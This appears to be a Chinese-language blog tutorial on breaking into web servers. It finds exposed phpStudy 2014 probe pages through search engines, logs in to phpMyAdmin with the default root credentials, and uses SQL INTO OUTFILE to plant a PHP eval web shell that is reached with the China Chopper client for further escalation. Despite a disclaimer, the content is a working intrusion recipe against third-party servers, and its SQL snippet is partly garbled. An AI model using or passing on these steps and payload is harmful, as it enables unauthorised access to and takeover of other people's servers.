声明:
本教程仅仅是演示管理员安全意识不强,存在弱口令情况.网站被非法入侵的演示,请勿用于恶意用途!
-
今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器,这个挺简单的.记录一下吧。
-
搜索引擎KeyWord:
phpStudy 探针 2014
-
多往后翻翻。翻个几十页最好。
-
点开搜索到的内容。
点开搜索到的内容。
翻到最下面,尝试连接mysql数据库是否正常(账号密码默认为:root):
1、 如果提示正常。请在网页后面加上 ‘phpmyadmin’,如 http://www.baidu.com/phpmyadmin
2、 然后回车即可。
3、 出现以下界面;默认账号密码尝试登陆;
4、 登陆成功后,第一步找到左边导航栏的MYSQL,然后点击上面的SQL,如图
5、 (点击mysql后,右侧表单会增加很多内容,不要理会他,直接点表单上方的SQL按钮即可。)
6、 下面往SQL写入一句话木马,然后用菜刀连接即可!
1、 图片效果不好,贴出代码,自行对比一下子- -
2、 Code:
mysq1
sql 语句
Drop TABLE IF EXISTS 菜刀连接密码; Create TABLE 自定义一个表名(cmd text NOT NULL); Insert INTO 自定义一个表名 (cmd) VALUES('<?php @eval($_POST[菜刀连接密码])?>'); Select cmd from 自己编写 into outfile 'D:/WWW/菜刀连接地址.php';['左边绝对地址需要根据网页自行更改'] Drop TABLE IF EXISTS 用户和密码;- 1
- 2
- 3
- 4
- 5
- 6
- 7
7、 添加完成后,使用菜刀连接;
后面tmp.php是在写入SQL一句话木马那自定义设置的。
成功连上!可自行提权服务器等操作!